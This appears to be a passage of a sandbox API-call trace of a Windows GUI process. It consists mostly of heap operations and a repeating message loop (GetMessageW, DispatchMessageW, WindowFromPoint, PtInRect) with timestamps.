HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.806] PtInRect (lprc=0x22e104, pt=0xd066) returned 0 [0249.806] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c0310 | out: hHeap=0x450000) returned 1 [0249.806] IntersectRect (in: lprcDst=0x22e630, lprcSrc1=0x22e630, lprcSrc2=0x22eee0 | out: lprcDst=0x22e630) returned 1 [0249.807] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02e0 | out: hHeap=0x450000) returned 1 [0249.807] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c02b0 | out: hHeap=0x450000) returned 1 [0249.807] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0249.807] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f17c | out: lpPoint=0x22f17c) returned 1 [0249.807] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0249.808] GetCurrentThreadId () returned 0xe9c [0249.808] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0249.808] GetCurrentThreadId () returned 0xe9c [0249.808] GetCurrentThreadId () returned 0xe9c [0249.808] PtInRect (lprc=0x22f1b8, pt=0x217) returned 1 [0249.808] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x200, wParam=0x0, lParam=0x1e0217, plResult=0x22f274 | out: plResult=0x22f274) returned 0x1 [0249.808] NtdllDefWindowProc_W () returned 0x0 [0249.808] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0249.809] GetMessageTime () returned 294717 [0249.809] GetMessagePos () returned 0x1450382 [0249.809] GetCapture () returned 0x0 [0249.809] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f17c | out: lpPoint=0x22f17c) returned 1 [0249.809] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bcd80 [0249.809] GetCurrentThreadId () returned 0xe9c [0249.809] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0249.809] GetCurrentThreadId () returned 0xe9c [0249.810] GetCurrentThreadId () returned 0xe9c [0249.810] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x464880 [0249.810] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f180 | out: lpPoint=0x22f180) returned 1 [0249.810] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x474120 [0249.810] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x474120 | out: hHeap=0x450000) returned 1 [0249.810] ClientToScreen (in: hWnd=0x201f2, lpPoint=0x22f180 | out: lpPoint=0x22f180) returned 1 [0249.810] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x474120 [0249.810] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x474120 | out: hHeap=0x450000) returned 1 [0249.810] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x464880 | out: hHeap=0x450000) returned 1 [0249.811] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x8004, wParam=0x0, lParam=0x1e0217, plResult=0x22f274 | out: plResult=0x22f274) returned 0x1 [0249.811] NtdllDefWindowProc_W () returned 0x0 [0249.811] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bcd80 | out: hHeap=0x450000) returned 1 [0249.811] GetCurrentThreadId () returned 0xe9c [0249.811] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0249.811] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0249.811] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0249.811] GetCurrentThreadId () returned 0xe9c [0249.811] GetCurrentThreadId () returned 0xe9c [0249.811] GetCurrentThreadId () returned 0xe9c [0249.811] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0250.102] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0250.102] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0250.102] GetCapture () returned 0x0 [0250.102] WindowFromPoint (Point=0x382) returned 0x201f2 [0250.102] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0250.102] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0250.102] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0250.102] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0250.102] GetCurrentThreadId () returned 0xe9c [0250.103] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0250.414] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0250.414] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0250.414] GetCapture () returned 0x0 [0250.414] WindowFromPoint (Point=0x382) returned 0x201f2 [0250.414] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0250.414] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0250.414] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0250.414] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0250.414] GetCurrentThreadId () returned 0xe9c [0250.415] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0250.810] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0250.810] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0250.810] GetCapture () returned 0x0 [0250.810] WindowFromPoint (Point=0x382) returned 0x201f2 [0250.810] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0250.810] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0250.810] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0250.810] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0250.810] GetCurrentThreadId () returned 0xe9c [0250.811] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0251.116] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0251.116] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0251.116] GetCapture () returned 0x0 [0251.116] WindowFromPoint (Point=0x382) returned 0x201f2 [0251.116] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0251.117] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0251.117] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0251.117] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0251.117] GetCurrentThreadId () returned 0xe9c [0251.117] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0251.444] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0251.444] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0251.444] GetCapture () returned 0x0 [0251.444] WindowFromPoint (Point=0x382) returned 0x201f2 [0251.444] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0251.444] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0251.444] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0251.445] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0251.445] GetCurrentThreadId () returned 0xe9c [0251.445] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0251.813] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0251.814] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0251.814] GetCapture () returned 0x0 [0251.814] WindowFromPoint (Point=0x382) returned 0x201f2 [0251.814] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0251.814] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0251.814] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0251.814] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0251.814] GetCurrentThreadId () returned 0xe9c [0251.814] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0252.114] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0252.114] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0252.115] GetCapture () returned 0x0 [0252.115] WindowFromPoint (Point=0x382) returned 0x201f2 [0252.115] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0252.115] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0252.115] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0252.115] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0252.115] GetCurrentThreadId () returned 0xe9c [0252.115] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0252.427] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0252.427] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0252.427] GetCapture () returned 0x0 [0252.427] WindowFromPoint (Point=0x382) returned 0x201f2 [0252.427] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0252.427] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0252.427] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0252.427] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0252.427] GetCurrentThreadId () returned 0xe9c [0252.427] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0252.743] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0252.743] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0252.743] GetCapture () returned 0x0 [0252.743] WindowFromPoint (Point=0x382) returned 0x201f2 [0252.744] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0252.744] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0252.744] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0252.744] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0252.744] GetCurrentThreadId () returned 0xe9c [0252.744] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0253.050] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0253.051] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0253.051] GetCapture () returned 0x0 [0253.051] WindowFromPoint (Point=0x382) returned 0x201f2 [0253.051] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0253.051] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0253.051] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0253.051] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0253.051] GetCurrentThreadId () returned 0xe9c [0253.051] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0253.363] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0253.363] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0253.363] GetCapture () returned 0x0 [0253.363] WindowFromPoint (Point=0x382) returned 0x201f2 [0253.363] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0253.363] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0253.363] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0253.363] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0253.363] GetCurrentThreadId () returned 0xe9c [0253.363] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0253.449] NtdllDefWindowProc_W () returned 0x1 [0253.450] NtdllDefWindowProc_W () returned 0x1 [0253.450] NtdllDefWindowProc_W () returned 0x1 [0253.829] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0253.829] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0253.829] GetCapture () returned 0x0 [0253.829] WindowFromPoint (Point=0x382) returned 0x201f2 [0253.829] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0253.829] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0253.829] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0253.829] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0253.829] GetCurrentThreadId () returned 0xe9c [0253.829] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0254.127] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0254.127] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0254.127] GetCapture () returned 0x0 [0254.127] WindowFromPoint (Point=0x382) returned 0x201f2 [0254.127] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0254.127] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0254.127] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0254.127] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0254.127] GetCurrentThreadId () returned 0xe9c [0254.127] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0254.439] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0254.439] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0254.439] GetCapture () returned 0x0 [0254.440] WindowFromPoint (Point=0x382) returned 0x201f2 [0254.440] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0254.440] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0254.440] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0254.440] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0254.440] GetCurrentThreadId () returned 0xe9c [0254.440] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0254.751] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0254.751] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0254.751] GetCapture () returned 0x0 [0254.751] WindowFromPoint (Point=0x382) returned 0x201f2 [0254.751] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0254.751] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0254.751] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0254.751] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0254.751] GetCurrentThreadId () returned 0xe9c [0254.751] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0255.063] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0255.063] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0255.063] GetCapture () returned 0x0 [0255.063] WindowFromPoint (Point=0x382) returned 0x201f2 [0255.063] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0255.063] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0255.063] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0255.063] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0255.063] GetCurrentThreadId () returned 0xe9c [0255.063] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0255.375] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0255.375] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0255.375] GetCapture () returned 0x0 [0255.375] WindowFromPoint (Point=0x382) returned 0x201f2 [0255.375] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0255.375] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0255.375] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0255.375] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0255.375] GetCurrentThreadId () returned 0xe9c [0255.375] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0255.757] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0255.757] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0255.757] GetCapture () returned 0x0 [0255.757] WindowFromPoint (Point=0x382) returned 0x201f2 [0255.757] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0255.757] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0255.757] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0255.757] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0255.757] GetCurrentThreadId () returned 0xe9c [0255.757] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0256.061] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0256.061] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0256.061] GetCapture () returned 0x0 [0256.062] WindowFromPoint (Point=0x382) returned 0x201f2 [0256.062] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0256.062] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0256.062] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0256.062] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0256.062] GetCurrentThreadId () returned 0xe9c [0256.062] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0256.373] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0256.373] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0256.373] GetCapture () returned 0x0 [0256.373] WindowFromPoint (Point=0x382) returned 0x201f2 [0256.374] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0256.374] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0256.374] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0256.374] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0256.374] GetCurrentThreadId () returned 0xe9c [0256.374] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0256.820] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0256.820] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0256.820] GetCapture () returned 0x0 [0256.820] WindowFromPoint (Point=0x382) returned 0x201f2 [0256.820] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0256.820] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0256.820] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0256.820] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0256.820] GetCurrentThreadId () returned 0xe9c [0256.820] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0257.122] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0257.122] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0257.122] GetCapture () returned 0x0 [0257.122] WindowFromPoint (Point=0x382) returned 0x201f2 [0257.122] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0257.122] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0257.123] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0257.123] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0257.123] GetCurrentThreadId () returned 0xe9c [0257.123] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0257.434] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0257.435] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0257.435] GetCapture () returned 0x0 [0257.435] WindowFromPoint (Point=0x382) returned 0x201f2 [0257.435] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0257.435] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0257.435] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0257.435] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0257.435] GetCurrentThreadId () returned 0xe9c [0257.435] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0257.746] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0257.746] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0257.746] GetCapture () returned 0x0 [0257.746] WindowFromPoint (Point=0x382) returned 0x201f2 [0257.746] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0257.746] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0257.746] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0257.746] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0257.746] GetCurrentThreadId () returned 0xe9c [0257.746] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0258.058] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0258.058] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0258.058] GetCapture () returned 0x0 [0258.058] WindowFromPoint (Point=0x382) returned 0x201f2 [0258.058] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0258.058] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0258.058] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0258.058] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0258.058] GetCurrentThreadId () returned 0xe9c [0258.058] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0258.371] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0258.371] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0258.371] GetCapture () returned 0x0 [0258.371] WindowFromPoint (Point=0x382) returned 0x201f2 [0258.371] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0258.371] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0258.371] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0258.372] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0258.372] GetCurrentThreadId () returned 0xe9c [0258.372] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0258.803] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0258.803] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0258.803] GetCapture () returned 0x0 [0258.803] WindowFromPoint (Point=0x382) returned 0x201f2 [0258.803] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0258.803] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0258.803] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0258.803] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0258.803] GetCurrentThreadId () returned 0xe9c [0258.803] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0259.103] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0259.103] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0259.103] GetCapture () returned 0x0 [0259.103] WindowFromPoint (Point=0x382) returned 0x201f2 [0259.104] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0259.104] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0259.104] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0259.104] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0259.104] GetCurrentThreadId () returned 0xe9c [0259.104] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0259.416] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0259.416] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0259.416] GetCapture () returned 0x0 [0259.416] WindowFromPoint (Point=0x382) returned 0x201f2 [0259.416] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0259.416] GetClientRect (in: hWnd=0x201f2, lpRect=0x22f178 | out: lpRect=0x22f178) returned 1 [0259.416] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22f188 | out: lpPoint=0x22f188) returned 1 [0259.416] PtInRect (lprc=0x22f178, pt=0x217) returned 1 [0259.416] GetCurrentThreadId () returned 0xe9c [0259.416] GetMessageW (in: lpMsg=0x22f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x22f6b4) returned 1 [0259.802] TranslateMessage (lpMsg=0x22f6b4) returned 0 [0259.802] DispatchMessageW (lpMsg=0x22f6b4) returned 0x0 [0259.802] GetCapture () returned 0x0 [0259.802] WindowFromPoint (Point=0x382) returned 0x201f2 [0259.802] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0259.802] GetClientRect 